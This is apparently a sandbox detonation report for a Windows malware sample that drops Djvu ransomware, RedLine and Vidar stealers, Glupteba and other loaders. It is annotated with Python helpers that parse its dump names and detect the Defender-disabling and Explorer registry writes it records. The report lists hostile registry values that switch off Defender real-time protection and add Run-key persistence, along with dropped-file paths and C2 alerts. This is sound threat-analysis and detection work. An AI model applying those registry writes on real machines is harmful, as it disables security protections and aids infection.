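memory/1088-189-0x0000000000400000-0x0000000000885000-memory.dmp
memory/2964-292-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-293-0x000000000041824E-mapping.dmp
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"(MD5|SHA1|SHA256|SHA512) ([0-9A-Fa-f]+)")
# Dump names read as memory/<pid>-<seq>-<range or address>-<kind>.dmp; inferred from the names.
REGION_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")
MAPPING_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-mapping\.dmp")


def normalize_path(path):
    """Fold the two spellings into one key; treating a drive-less path as C: is an assumption."""
    if path.startswith("\\"):
        path = "C:" + path
    return path.lower()


def parse_files_section(text):
    """Distinct files keyed by SHA256, dump regions and mappings per PID, and a problem list."""
    files, problems = {}, []
    regions, mappings = defaultdict(list), defaultdict(list)
    current = None

    def flush():
        nonlocal current
        if current is None:
            return
        sha = current["hashes"].get("SHA256")
        if sha is None:
            problems.append(f"no SHA256 for {current['path']}")
        else:
            entry = files.setdefault(sha, {"paths": set(), "hashes": {}})
            entry["paths"].add(normalize_path(current["path"]))
            for alg, digest in current["hashes"].items():   # repeated entries must agree
                if entry["hashes"].setdefault(alg, digest) != digest:
                    problems.append(f"{alg} disagrees between entries for SHA256 {sha}")
        current = None

    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := REGION_RE.fullmatch(line):
            flush()
            pid, seq, start, end = m.groups()
            regions[int(pid)].append((int(seq), int(start, 16), int(end, 16)))
        elif m := MAPPING_RE.fullmatch(line):
            flush()
            pid, seq, addr = m.groups()
            mappings[int(pid)].append((int(seq), int(addr, 16)))
        elif m := HASH_RE.fullmatch(line):
            alg, digest = m.groups()
            if current is None:
                problems.append(f"{alg} line with no preceding path")
            elif len(digest) != HASH_LEN[alg]:
                problems.append(f"{alg} for {current['path']} has {len(digest)} hex digits")
            else:
                current["hashes"][alg] = digest.lower()
        else:                       # anything else starts a new file entry
            flush()
            current = {"path": line, "hashes": {}}
    flush()
    return {"files": files, "regions": dict(regions), "mappings": dict(mappings), "problems": problems}


def redumped_regions(regions):
    """Exact ranges dumped more than once for one PID, (pid, start, end) -> count.
    Repeated dumps of the image range usually mean it was rewritten in place (an unpacking stage)."""
    counts = defaultdict(int)
    for pid, entries in regions.items():
        for _seq, start, end in entries:
            counts[(pid, start, end)] += 1
    return {k: v for k, v in counts.items() if v > 1}


def mappings_inside_dumped_region(regions, mappings):
    """Non-zero mapping addresses that fall inside a range dumped from the same PID."""
    hits = []
    for pid, entries in mappings.items():
        for seq, addr in entries:
            for _seq, start, end in regions.get(pid, []):
                if addr and start <= addr < end:
                    hits.append((pid, seq, addr, start, end))
                    break
    return hits


if __name__ == "__main__":
    result = parse_files_section(SAMPLE_FILES_SECTION)
    print(len(result["files"]), "distinct file(s);", result["problems"] or "no problems")
    print(redumped_regions(result["regions"]), mappings_inside_dumped_region(result["regions"], result["mappings"]))
```

Run against the whole Files section, the distinct-file set is what goes into a blocklist, and the per-PID index tells you which dumps to open first: PIDs whose 0x400000 range was captured several times (1088 and 2964 on this page) and the one mapping whose address lies inside such a range.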

Analysis: behavioral2

Detonation Overview

Submitted

2022-07-05 10:59

Reported

2022-07-05 11:07

Platform

win10v2004-20220414-en

Max time kernel

450s

Max time network

453s

Command Line

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

Signatures

Amadey

trojan amadey

Colibri Loader

loader colibri

Detected Djvu ransomware

10 matches recorded; the sandbox logged no description, indicator, process or target for any of them.

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\Dis
ableIOAVProtection = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A

Modifies visibility of file extensions in Explorer

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" | N/A | N/A

Modifies visibility of hidden/system files in Explorer

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | N/A | N/A
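
The Defender table above records writes, through the 32-bit (WOW6432Node) view, to the Group Policy override key for real-time protection: every Disable* value set to 1, once by the submitted sample and once by the dropped s0NrNwyfXpxCyzS03I8CZcLq.exe. The Explorer rows change per-user view settings (HideFileExt = 0 shows file extensions, ShowSuperHidden = 0 hides protected operating system files). The Python below is an added example, not code from the sandbox or this report: it parses rows in the report's flattened "Description Indicator Process Target" layout and flags those two behaviours, noting which registry view each write went to. The row regex assumes the Target column is a single token, as it is in every row here; the sample rows are copied from the tables above, except for a made-up gpupdate.exe row that sets a value back to 0 and must not be flagged.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied from the Defender and Explorer tables above, plus one
# made-up benign write (gpupdate.exe restoring a value to 0), in this report's flat layout.
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "0" C:\Windows\System32\gpupdate.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" N/A N/A
"""

# One flattened row: operation, registry path, optional = "value", writing process, target.
# Assumes the Target column is a single token (it is N/A in every row of this report).
ROW_RE = re.compile(
    r'^(?P<op>Key created|Set value \((?P<type>\w+)\)) '
    r'(?P<key>\\REGISTRY\\.+?)'
    r'(?: = "(?P<value>[^"]*)")?'
    r' (?P<process>[A-Za-z]:\\.+?|N/A)'
    r' (?P<target>\S+)$'
)

# Group Policy override key Defender honours; a value of 1 switches the feature off.
DEFENDER_RTP_KEY = "\\policies\\microsoft\\windows defender\\real-time protection"
DEFENDER_DISABLE_VALUES = {
    "disablerealtimemonitoring", "disablebehaviormonitoring", "disableonaccessprotection",
    "disableioavprotection", "disablescanonrealtimeenable", "disablerawwritenotification",
}
# Explorer view settings: HideFileExt=0 shows extensions, ShowSuperHidden=0 hides protected OS files.
EXPLORER_ADVANCED_KEY = "\\microsoft\\windows\\currentversion\\explorer\\advanced"
EXPLORER_VISIBILITY_VALUES = {"hidefileext", "showsuperhidden", "hidden"}


def normalize_key(key):
    """Lower-case and drop the WOW6432Node hop so 32-bit and 64-bit views compare equal."""
    return key.lower().replace("\\wow6432node\\", "\\")


def classify(row):
    """Finding dict for a Defender-disable or Explorer-visibility write, else None."""
    if row["value"] is None:            # "Key created" rows carry no value to judge
        return None
    parent, _, name_l = normalize_key(row["key"]).rpartition("\\")
    finding = {
        "process": row["process"],
        "name": row["key"].rpartition("\\")[2],
        "value": row["value"],
        "wow64_view": "\\wow6432node\\" in row["key"].lower(),
    }
    if parent.endswith(DEFENDER_RTP_KEY) and name_l in DEFENDER_DISABLE_VALUES and row["value"] == "1":
        return {"kind": "defender_rtp_disabled", **finding}
    if parent.endswith(EXPLORER_ADVANCED_KEY) and name_l in EXPLORER_VISIBILITY_VALUES:
        return {"kind": "explorer_visibility", **finding}
    return None


def detect(text):
    """Parse and classify every row; rows that do not parse are reported rather than dropped."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            findings.append({"kind": "unparsed", "line": line})
            continue
        f = classify(m.groupdict())
        if f is not None:
            findings.append(f)
    return findings


def by_process(findings):
    """Which process switched off what, in the order the rows were recorded."""
    out = defaultdict(list)
    for f in findings:
        if f["kind"] != "unparsed":
            out[f["process"]].append(f["name"])
    return dict(out)


if __name__ == "__main__":
    for proc, names in by_process(detect(SAMPLE_ROWS)).items():
        print(proc, "->", ", ".join(names))
```

Because the recorded paths sit under WOW6432Node, an audit of a live host should read both the 32-bit and the 64-bit view of HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection and then confirm the effective state with Get-MpPreference (the Disable* properties) and Get-MpComputerStatus: where Tamper Protection is on, writes like these may be recorded without taking effect, so the registry rows show intent, not outcome.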

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

Vidar

stealer vidar

suricata: ET MALWARE Amadey CnC Check-In

suricata

suricata: ET MALWARE Generic gate .php GET with minimal headers

suricata

suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

suricata

suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

suricata

suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

suricata

suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved

suricata

suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer

suricata

suricata: ET MALWARE Win32/Colibri Loader Activity

suricata

suricata: ET MALWARE Win32/Colibri Loader Activity M2

suricata

suricata: ET MALWARE Win32/Colibri Loader Activity M3

suricata

suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download

suricata

suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key

suricata

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

suricata

suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload

suricata

Vidar Stealer

stealer
6 matches recorded; the sandbox logged no description, indicator, process or target for any of them.

Blocklisted process makes network request

Process (Description, Indicator and Target were N/A for both rows)
C:\Windows\system32\RunDll32.exe
C:\Windows\SysWOW64\rundll32.exe

Downloads MZ/PE file

Executes dropped EXE

Process (one row per recorded execution; Description, Indicator and Target were N/A for every row)
C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe
C:\Users\Admin\AppData\Local\Temp\M52CB.exe
C:\Windows\system32\RunDll32.exe
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
C:\Users\Admin\AppData\Local\Temp\EH46E.exe
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
C:\ProgramData\50543188494393494002.exe
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe
C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe
C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe
C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\6DF1.exe
C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe
C:\Users\Admin\AppVerif\DllHelper.exe
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
C:\Users\Admin\AppData\Local\Temp\7BCD.exe
C:\Windows\SysWOW64\reg.exe
C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe

Modifies Windows Firewall

evasion
Process (Description, Indicator and Target were N/A)
C:\Windows\system32\netsh.exe

UPX packed file

upx
10 matches recorded; the sandbox logged no description, indicator, process or target for any of them.

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A

Checks computer location settings

Description: Key value queried
Indicator: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation (the same value for every row)
Target: N/A
Process (one row per query, in the order recorded)
C:\ProgramData\50543188494393494002.exe
C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe
C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe
C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\6DF1.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
C:\Users\Admin\AppData\Local\Temp\EH46E.exe
C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
C:\Users\Admin\AppData\Local\Temp\7BCD.exe
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe
C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

Loads dropped DLL

Process | DLL loads recorded (consecutive identical rows collapsed; Description, Indicator and Target were N/A for every row)
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe | 15
C:\Windows\System32\Conhost.exe | 2
C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe | 2
C:\Windows\SysWOW64\rundll32.exe | 2
C:\Windows\SysWOW64\WerFault.exe | 2
C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe | 3
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe | 2
C:\Windows\SysWOW64\rundll32.exe | 6
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe | 7
C:\Users\Admin\AppData\Local\Temp\EF2C.exe | 15
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | 1
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | 1
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | 1
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | 4
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif | 1

Modifies file permissions

discovery
Process (Description, Indicator and Target were N/A)
C:\Windows\SysWOW64\icacls.exe

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\SysWOW64\rundll32.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" | C:\Users\Admin\AppData\Local\Temp\0BB4J.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wzocvkk = "\"C:\\Users\\Admin\\AppData\\Roaming\\Okjeqdz\\Wzocvkk.exe\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\signed.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Service = "C:\\ProgramData\\MsDrvSrvc.exe" | C:\Users\Admin\AppData\Local\Temp\signed.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\72bf7303-5dc0-44e9-87d8-698f8677acab\\kdnmdIr2m3Z75rmoxMQY45zR.exe\" --AutoStart" | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe | N/A
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe N/A
